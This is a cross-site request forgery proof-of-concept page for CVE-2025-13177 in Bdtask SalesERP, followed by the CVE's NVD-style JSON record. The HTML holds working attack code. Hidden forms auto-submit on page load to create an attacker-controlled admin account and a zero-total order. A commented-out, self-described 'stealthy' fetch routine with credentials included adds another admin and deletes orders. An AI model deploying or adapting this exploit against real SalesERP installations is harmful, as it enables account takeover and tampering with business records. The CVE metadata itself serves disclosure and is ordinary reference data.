CVE-2025-13177

<!-- CSRF PoC for CVE-2025-13177 - Bdtask CodeCanyon SalesERP --> <!-- This PoC demonstrates CSRF attack on SalesERP user management --> <!DOCTYPE html> <html> <head> <title>SalesERP CSRF Attack PoC</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .malicious-form { display: none; } .info { color: #666; font-size: 12px; } </style> </head> <body> <h2>CVE-2025-13177 CSRF PoC</h2> <p class="info">Target: Bdtask/CodeCanyon SalesERP</p> <!-- Auto-submit form targeting SalesERP user creation endpoint --> <form id="csrfForm" class="malicious-form" action="http://target-server/saleserp/index.php/admin/user/create" method="POST"> <input type="hidden" name="username" value="attacker_created"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="user_role" value="admin"> <input type="hidden" name="csrf_token" value=""> </form> <!-- Form targeting SalesERP order processing --> <form id="orderForm" class="malicious-form" action="http://target-server/saleserp/index.php/sales/order/create" method="POST"> <input type="hidden" name="customer_id" value="999"> <input type="hidden" name="product_ids" value="1,2,3"> <input type="hidden" name="quantity" value="100"> <input type="hidden" name="total_amount" value="0"> </form> <script> // Auto-submit both forms when page loads window.onload = function() { console.log('CSRF PoC executing...'); document.getElementById('csrfForm').submit(); setTimeout(function() { document.getElementById('orderForm').submit(); }, 1000); }; </script> <p>Redirecting...</p> <script> // Alternative: Use fetch API for more stealthy attack async function exploitCSRF() { const targets = [ { url: 'http://target-server/saleserp/index.php/admin/user/create', data: new URLSearchParams({ 'username': 'hacked_user', 'email': '[email protected]', 'password': 'Hacked123!', 'user_role': 'admin' }) }, { url: 'http://target-server/saleserp/index.php/sales/order/delete/1', data: new URLSearchParams({ 'confirm': 'yes' }) } ]; for (const target of targets) { try { await fetch(target.url, { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: target.data }); console.log('Request sent to: ' + target.url); } catch (e) { console.error('Error:', e); } } } // Uncomment to use fetch-based attack // exploitCSRF(); </script> </body> </html>

{"cve": {"id": "CVE-2025-13177", "sourceIdentifier": "[email protected]", "published": "2025-11-14T19:15:57.977", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Bdtask/CodeCanyon SalesERP up to 20250728. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bdtask:saleserp:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-10-16", "matchCriteriaId": "151D4B11-738A-4D27-829E-056E343786C4"}]}]}], "references": [{"url": "https://github.com/4m3rr0r/PoCVulDb/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332467", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332467", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.684819", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/4m3rr0r/PoCVulDb/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}